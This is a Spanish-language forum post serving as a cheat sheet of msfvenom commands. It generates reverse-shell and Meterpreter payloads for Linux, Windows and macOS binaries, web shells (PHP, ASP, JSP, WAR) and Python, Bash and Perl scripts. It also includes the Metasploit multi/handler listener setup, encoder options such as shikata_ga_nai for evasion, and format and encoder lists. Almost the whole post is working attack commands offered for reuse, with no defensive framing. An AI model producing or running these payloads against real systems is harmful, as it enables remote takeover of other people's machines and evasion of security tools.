Payloads de Metasploit [Msf Venom]

editado November 9 en General

Hola compañeros aqui les muestro los payloads que podemos crear con Msf Venom

Listar Payloads

msfvenom -l

Binarios

## Payload para Linux:
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Dirección IP a Conectar> LPORT=<Puerto a Conectar> -f elf > shell.elf

## Payload para Windows:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Dirección IP a Conectar> LPORT=<Puerto a Conectar> -f exe > shell.exe

## Payload Para MAC:
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Dirección IP a Conectar> LPORT=<Puerto a Conectar> -f macho > shell.macho

Payloads Web

## PHP
msfvenom -p php/meterpreter_reverse_tcp LHOST=<Dirección IP a Conectar> LPORT=<Puerto a Conectar> -f raw > shell.php

## ASP
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Dirección IP a Conectar> LPORT=<Puerto a Conectar> -f asp > shell.asp

## JSP
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Dirección IP a Conectar> LPORT=<Puerto a Conectar> -f raw > shell.jsp

## WAR
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Dirección IP a Conectar> LPORT=<Puerto a Conectar> -f war > shell.war

Scripting Payloads

## Python
msfvenom -p cmd/unix/reverse_python LHOST=<Dirección IP a Conectar> LPORT=<Puerto a Conectar> -f raw > shell.py

## Bash
msfvenom -p cmd/unix/reverse_bash LHOST=<Dirección IP a Conectar> LPORT=<Puerto a Conectar> -f raw > shell.sh

## Perl
msfvenom -p cmd/unix/reverse_perl LHOST=<Dirección IP a Conectar> LPORT=<Puerto a Conectar> -f raw > shell.pl

Shellcode

Linux Based Shellcode
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Dirección IP a Conectar> LPORT=<Puerto a Conectar> -f <language>
Windows Based Shellcode
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Dirección IP a Conectar> LPORT=<Puerto a Conectar> -f <language>
Mac Based Shellcode
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Dirección IP a Conectar> LPORT=<Puerto a Conectar> -f <language>

Handlers

use exploit/multi/handler
set PAYLOAD <Nombre del Payload>
set LHOST <Tu Dirección Ip>
set LPORT <Tu Puerto>
set ExitOnSession false
exploit -j -z

Parámetros Comunes

--platform windows [Establece la Plataforma]
-a x86 o -a x64 [Establece la Arquitectura]
-f exe [Establece el Formato]
-e x86/shikata_ga_nai [Establece un Encoder]
-i 10 [Establece la Cantidad de Iteraciones que Pasara el Encoder]

Lista de Plataformas

Cisco or cisco
OSX or osx
Solaris or solaris
BSD or bsd
OpenBSD or openbsd
hardware
Firefox or firefox
BSDi or bsdi
NetBSD or netbsd
NodeJS or nodejs
FreeBSD or freebsd
Python or python
AIX or aix
JavaScript or javascript
HPUX or hpux
PHP or php
Irix or irix
Unix or unix
Linux or linux
Ruby or ruby
Java or java
Android or android
Netware or netware
Windows or windows
mainframe
multi

Lista de Formatos

Executable formats
asp, aspx, aspx-exe, axis2, dll, elf, elf-so, exe, exe-only, exe-service, exe-small, hta-psh, jar, jsp, loop-vbs, macho, msi, msi-nouac, osx-app, psh, psh-cmd, psh-net, psh-reflection, vba, vba-exe, vba-psh, vbs, war

Transform formats
bash, c, csharp, dw, dword, hex, java, js_be, js_le, num, perl, pl, powershell, ps1, py, python, raw, rb, ruby, sh, vbapplication, vbscript

Lista de Encoders

cmd/echo
cmd/generic_sh
cmd/ifs
cmd/perl
cmd/powershell_base64
cmd/printf_php_mq
generic/eicar
generic/none
mipsbe/byte_xori
mipsbe/longxor
mipsle/byte_xori
mipsle/longxor
php/base64
ppc/longxor
ppc/longxor_tag
sparc/longxor_tag
x64/xor
x86/add_sub
x86/alpha_mixed
x86/alpha_upper
x86/avoid_underscore_tolower
x86/avoid_utf8_tolower
x86/call4_dword_xor
x86/context_cpuid
x86/context_stat
x86/context_time
x86/countdown
x86/fnstenv_mov
x86/jmp_call_additive
x86/nonalpha
x86/nonupper
x86/opt_sub
x86/shikata_ga_nai
x86/single_static_bit
x86/unicode_mixed
x86/unicode_upper

Otros que pueden servir

Metasploit
Use exploit/multi/script/web_delivery

Con este puedes utilizar entre tres plataformas
Powershell
Python
PHP

Me hace falta uno que convertía en EXE un archivo batch

Si hace falta algo, por favor haganlo saber, Gracias :D

P.D. Les Dejo Como ver todos los Payloads de Metasploit

Dentro de metasploit
show payloads

Dentro de Msf Venom
msfvenom -l payloads

Comentarios

Accede o Regístrate para comentar.